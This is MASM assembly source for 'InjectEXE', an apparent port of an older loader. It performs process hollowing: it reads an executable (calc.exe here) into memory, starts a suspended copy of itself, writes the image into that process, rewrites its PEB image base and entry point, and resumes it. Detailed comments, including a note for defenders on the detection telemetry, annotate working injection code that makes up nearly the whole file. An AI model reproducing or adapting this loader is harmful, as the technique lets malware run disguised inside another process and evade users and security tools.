Gonzalez

[MASM] InjectEXE

comment ^
WebEXE originally by aphex ported by shapeless
^


.386

.model flat, stdcall
option casemap: none



include c:\masm32\include\windows.inc
include c:\masm32\include\kernel32.inc
include c:\masm32\include\masm32.inc

includelib c:\masm32\lib\masm32.lib
includelib c:\masm32\lib\kernel32.lib



.data
szFile db "calc.exe",0          ; PE image to read and lay out; a relative path, resolved against the current directory when CreateFile runs

.data?

fHandle dword ?                 ; handle returned by CreateFile for szFile
dwSize dword ?                  ; file size from GetFileSize
pBuff dword ?                   ; VirtualAlloc'd buffer holding the raw file bytes
BytesRead dword ?               ; byte-count out-parameter shared by ReadFile and WriteProcessMemory


ImageSize dword ?               ; SectionAlignment-rounded size of headers plus every section's VirtualSize
InjectMem dword ?               ; local buffer that receives the section-aligned layout of the image
pFileData dword ?               ; write cursor into InjectMem while headers and sections are copied
HeaderSize dword ?              ; bytes copied as headers: min(SizeOfHeaders, smallest PointerToRawData)

szFileName byte 256 dup(?)      ; this executable's own path (GetModuleFileName), used as the CreateProcess target



contxt CONTEXT <>               ; initial thread context of the suspended child (filled with CONTEXT_FULL)
ProcInfo PROCESS_INFORMATION <> ; process/thread handles returned by CreateProcess
StartInfo STARTUPINFO <>        ; zeroed before CreateProcess; no fields are set


.code

comment ^
inline DWORD GetAlignedSize(DWORD Size, DWORD Alignment)
{
if( Size % Alignment == 0 )
return Size;

return (((Size / Alignment) + 1) * Alignment);
}
^

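;-----------------------------------------------------------------------
; DWORD GetAligned(DWORD dSize, DWORD Aligned)
; Rounds dSize up to the next multiple of Aligned; returns dSize itself
; when it is already a multiple.  Aligned == 0 now returns dSize unchanged
; instead of faulting in div.
; ABI:   stdcall, two dword stack args
; Out:   eax = rounded size (high dword of the final product is discarded,
;        as in the original)
; Clobb: eax, flags; ecx and edx are saved/restored by "uses"
;-----------------------------------------------------------------------
GetAligned proc uses ecx edx dSize:dword,Aligned:dword
    mov     eax,dSize
    mov     ecx,Aligned
    jecxz   @F                      ; Aligned == 0: nothing to round to, return dSize
    xor     edx,edx                 ; div takes edx:eax
    div     ecx                     ; eax = dSize / Aligned, edx = dSize mod Aligned
    test    edx,edx                 ; remainder 0 -> already aligned
    jz      @F
    inc     eax                     ; round the quotient up ...
    mul     ecx                     ; ... eax = (quotient + 1) * Aligned
    ret
@@:
    mov     eax,dSize               ; unchanged: already a multiple (or Aligned == 0)
    ret
GetAligned endp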





;-----------------------------------------------------------------------
; __ep - program entry point (see "end __ep").
; Reads the PE named in szFile, lays it out in a local buffer at section
; alignment, starts a suspended copy of this executable, writes that
; layout into the child at the image's preferred ImageBase, patches the
; child's PEB image base and initial eax, and resumes it.
; For defenders: the API chain below - CreateProcess with CREATE_SUSPENDED,
; VirtualAllocEx + WriteProcessMemory into another process, a 4-byte write
; at PEB+8, SetThreadContext, ResumeThread - is the canonical process-
; hollowing ("RunPE") sequence and is exactly what EDR/ETW telemetry and
; memory scanners key on (private RWX regions, image base != on-disk image).
; Registers: edi = IMAGE_NT_HEADERS of the file in pBuff,
;            esi = current IMAGE_SECTION_HEADER, dx = remaining sections.
; No API return value is checked anywhere in this block; a failed
; CreateFile, VirtualAlloc, ReadFile or CreateProcess falls through.
;-----------------------------------------------------------------------
__ep:


invoke CreateFile,addr szFile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0
mov fHandle,eax                 ; not compared against INVALID_HANDLE_VALUE

invoke GetFileSize,eax,0        ; eax still holds the file handle
mov dwSize,eax

invoke VirtualAlloc,0,eax,MEM_COMMIT,PAGE_EXECUTE_READWRITE   ; raw-file buffer; RWX although it is only read
mov pBuff,eax

invoke ReadFile,fHandle,eax,dwSize,addr BytesRead,0
mov eax,pBuff
xchg eax,edi                    ; edi = pBuff (xchg used as a mov)

assume edi:ptr IMAGE_DOS_HEADER
add edi,[edi].e_lfanew          ; edi = NT headers; no MZ/PE signature or e_lfanew bounds check
assume edi:ptr IMAGE_NT_HEADERS


; esi = first section header = &OptionalHeader + SizeOfOptionalHeader
xor esi,esi
mov si,[edi].FileHeader.SizeOfOptionalHeader
lea eax,[edi].OptionalHeader
add esi,eax

assume esi:ptr IMAGE_SECTION_HEADER




push [edi].OptionalHeader.SizeOfHeaders
pop HeaderSize                  ; HeaderSize = SizeOfHeaders; lowered in pass 1 if a section's raw data starts earlier


invoke GetAligned,[edi].OptionalHeader.SizeOfHeaders,[edi].OptionalHeader.SectionAlignment
mov ImageSize,eax               ; ImageSize starts as the section-aligned header size

; save the aligned header size; popped after pass 1 to advance pFileData past the headers
push eax


; save esi (first section header) for pass 2
push esi


; Pass 1 over the section table: add each aligned VirtualSize to ImageSize
; and track the smallest PointerToRawData in HeaderSize.
; dx is a 16-bit counter with no zero guard: NumberOfSections == 0 would
; wrap to 0FFFFh on the first dec and walk far past the table.
mov dx,[edi].FileHeader.NumberOfSections
@@:

cmp [esi].Misc.VirtualSize,0
je lZero                        ; empty section occupies nothing
invoke GetAligned,[esi].Misc.VirtualSize,[edi].OptionalHeader.SectionAlignment   ; GetAligned preserves edx ("uses ecx edx")
add ImageSize,eax
lZero:

mov eax,HeaderSize
cmp eax,[esi].PointerToRawData
jbe lNotSmaller
push [esi].PointerToRawData
pop HeaderSize                  ; HeaderSize = min(HeaderSize, PointerToRawData)
lNotSmaller:


; next item!
add esi,SizeOf IMAGE_SECTION_HEADER
dec dx
jnz @B


; restore esi!
pop esi

invoke VirtualAlloc,0,ImageSize,MEM_COMMIT,PAGE_EXECUTE_READWRITE   ; local, section-aligned copy of the image
mov InjectMem,eax               ; base of the laid-out image
mov pFileData,eax               ; write cursor into it

invoke RtlMoveMemory,eax,pBuff,HeaderSize   ; headers first

; pop the aligned header size saved above and move the cursor past the headers
pop eax
add pFileData,eax

; Pass 2: copy min(SizeOfRawData, VirtualSize) bytes of each section from
; pBuff + PointerToRawData, then advance the cursor by the aligned
; VirtualSize.  VirtualAddress is never read, so sections are placed back
; to back in table order; PointerToRawData/SizeOfRawData are not checked
; against dwSize, so a malformed file reads past pBuff.
mov dx,[edi].FileHeader.NumberOfSections
@@:

mov eax,[esi].SizeOfRawData
cmp eax,0
jbe lBelowOrZero                ; unsigned "<= 0" is just "== 0"
cmp eax,[esi].Misc.VirtualSize
jbe lBelowOrZero2
mov eax,[esi].Misc.VirtualSize  ; eax = min(SizeOfRawData, VirtualSize)
lBelowOrZero2:

mov ecx,pBuff
add ecx,[esi].PointerToRawData  ; ecx = section's raw bytes in the file buffer

; save the counter value! (edx is not preserved across the stdcall API call)
push edx
invoke RtlMoveMemory,pFileData,ecx,eax
pop edx

invoke GetAligned,[esi].Misc.VirtualSize,[edi].OptionalHeader.SectionAlignment
add pFileData,eax

jmp lContinue
lBelowOrZero:

; SizeOfRawData was 0: nothing to copy, but the section still takes its
; aligned VirtualSize in the layout

cmp [esi].Misc.VirtualSize,0
je lContinue

invoke GetAligned,[esi].Misc.VirtualSize,[edi].OptionalHeader.SectionAlignment
add pFileData,eax


lContinue:
; next item!
add esi,SizeOf IMAGE_SECTION_HEADER
dec dx
jnz @B



invoke RtlZeroMemory,addr contxt,SizeOf CONTEXT
invoke RtlZeroMemory,addr StartInfo,SizeOf STARTUPINFO

invoke GetModuleFileName,0,addr szFileName,SizeOf szFileName   ; hModule 0 = this executable's own path

; the host is a suspended copy of this program itself
invoke CreateProcess,0,addr szFileName,0,0,0,CREATE_SUSPENDED,0,0,addr StartInfo,addr ProcInfo

mov contxt.ContextFlags,CONTEXT_FULL
invoke GetThreadContext,ProcInfo.hThread,addr contxt
; the laid-out image is written at its preferred ImageBase in the child (no relocation processing anywhere in this file)
invoke VirtualAllocEx,ProcInfo.hProcess,[edi].OptionalHeader.ImageBase,ImageSize,MEM_RESERVE or MEM_COMMIT,PAGE_EXECUTE_READWRITE
invoke WriteProcessMemory,ProcInfo.hProcess,[edi].OptionalHeader.ImageBase,InjectMem,ImageSize,addr BytesRead
; 4-byte write of the new ImageBase at [ebx+8] of the child's initial context
; (ebx = PEB for a freshly created 32-bit process; +8 = PEB.ImageBaseAddress)
mov eax,contxt.regEbx
add eax,8
lea ecx,[edi].OptionalHeader.ImageBase
invoke WriteProcessMemory,ProcInfo.hProcess,eax,ecx,4,addr BytesRead
; initial eax of the child = ImageBase + AddressOfEntryPoint of the injected image
push [edi].OptionalHeader.ImageBase
pop eax
add eax,[edi].OptionalHeader.AddressOfEntryPoint
mov contxt.regEax,eax
invoke SetThreadContext,ProcInfo.hThread,addr contxt
invoke ResumeThread,ProcInfo.hThread


invoke VirtualFree,InjectMem,0,MEM_RELEASE

invoke VirtualFree,pBuff,0,MEM_RELEASE

invoke CloseHandle,fHandle      ; ProcInfo.hProcess and ProcInfo.hThread are never closed

ret
end __ep
